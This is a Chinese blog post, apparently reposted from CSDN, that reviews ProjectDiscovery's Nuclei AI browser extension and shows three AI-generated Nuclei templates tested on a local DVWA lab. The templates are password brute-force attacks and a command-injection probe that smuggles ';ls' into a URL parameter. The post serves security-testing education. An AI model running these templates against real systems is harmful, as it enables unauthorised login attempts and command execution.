0


关于nuclei-ai-extension

nuclei-ai-extension

🍁 Nuclei 官方开发的 利用 AI 生成 nuclei 模板的工具。Nuclei AI - 用于快速生成 Nuclei 模板的浏览器扩展,Nuclei AI Browser Extension建立在 cloud.projectdiscovery.io 之上,使用户能够从任何网页中提取漏洞信息,快速有效地创建Nuclei模板,从而简化漏洞模板的创建,从而节省宝贵的时间和精力。

项目地址:https://github.com/projectdiscovery/nuclei-ai-extension

功能简介

  • 用于生成模板的上下文菜单选项
  • HackerOne 报告到 nuclei 模板生成
  • ExploitDB 对 Nuclei 模板生成的漏洞利用
  • BugCrowd / Intigriti / Synack 支持(即将推出)

安装

该程序以 chromium 系列浏览器插件形式安装

使用

使用此扩展程序需要 cloud.projectdiscovery.io 上的登录帐户。您可以在使用 Nuclei AI 的功能之前注册或登录。

  • 要使用上下文菜单从任何网站上的选定文本生成细胞核模板:
  • 从任何网站、博客或推文中选择漏洞信息。
  • 右键单击以打开上下文菜单,然后选择“Generate Nuclei Template”选项。
  • 如果需要,请进行任何更改以改进或更新提示。
  • 单击“生成”按钮。
  • AI 将根据所选文本生成一个 Nuclei 模板。

快捷键:在任何网页上按 CLT+SHIFT+O 可切换(打开/隐藏)AI 编辑器窗口。

测试

测试使用 DVWA 靶场进行测试 ,使用 Docker 部署。

  • 测试一:DVWA 登陆界面测试生成 pass fuzz 模板

生成模板如下:

  1. id: login-pass-fuzz-brute
  2. info:
  3. name: Login Password Fuzz Brute
  4. author: pdteam
  5. severity: info
  6. reference: http://127.0.0.1:4280/login.php
  7. http:
  8. - method: POST
  9. path:
  10. - "{{BaseURL}}/login.php"
  11. payloads:
  12. username:
  13. - admin
  14. password:
  15. - fuzz.txt
  16. attack: clusterbomb
  17. body: "username=§username§&password=§password§"
  18. matchers:
  19. - type: word
  20. words:
  21. - "Welcome Admin"
  • 测试二:DVWA 第一关 Vulnerability: Brute Force ,模板如下

图片

  1. id: http-get-fuzzing-example
  2. info:
  3. name: HTTP GET Fuzzing Example
  4. author: pdteam
  5. severity: info
  6. reference: http://127.0.0.1:4280/vulnerabilities/brute/?username=admin&password=pass&Login=Login#
  7. http:
  8. - method: GET
  9. path:
  10. - "{{BaseURL}}?username=admin&password={{fuzz}}&Login=Login#"
  11. payloads:
  12. fuzz:
  13. - admin
  14. - pass
  15. - password
  16. matchers:
  17. - type: word
  18. words:
  19. - "Welcome Admin"
  • 测试三:DVWA 第二关 Vulnerability: Command Injection 模板如下

图片

  1. id: command-injection-ls
  2. info:
  3. name: Command Injection ;ls
  4. author: pdteam
  5. severity: high
  6. reference: http://127.0.0.1:4280/vulnerabilities/exec/#
  7. http:
  8. - method: GET
  9. path:
  10. - "{{BaseURL}}/?ip=;ls"
  11. matchers:
  12. - type: word
  13. words:
  14. - "bin"
  15. - "boot"
  16. - "dev"
  17. - "etc"
  18. - "home"
  19. - "lib"
  20. - "opt"
  21. - "root"
  22. - "sbin"
  23. - "srv"
  24. - "tmp"
  25. - "usr"
  26. - "var"
  27. part: body

总结

在渗透测试,漏洞挖掘等等过程中,编写 poc 是必不可少的一个过程,该工具使用 nuclei 作为漏洞扫描工具,自动化编写结合 AI 编写模板,大大节约了测试流程时间,提高工作效率,值得一试。可根据提示词自定义模板具体生成内容,部分模板可能生成的有些许问题,但是简单修改完全可以投入使用

标签: 测试

本文转载自: https://blog.csdn.net/2301_81475812/article/details/136123997
版权归原作者 L-You 所有, 如有侵权,请联系我们删除。

“关于nuclei-ai-extension”的评论:

还没有评论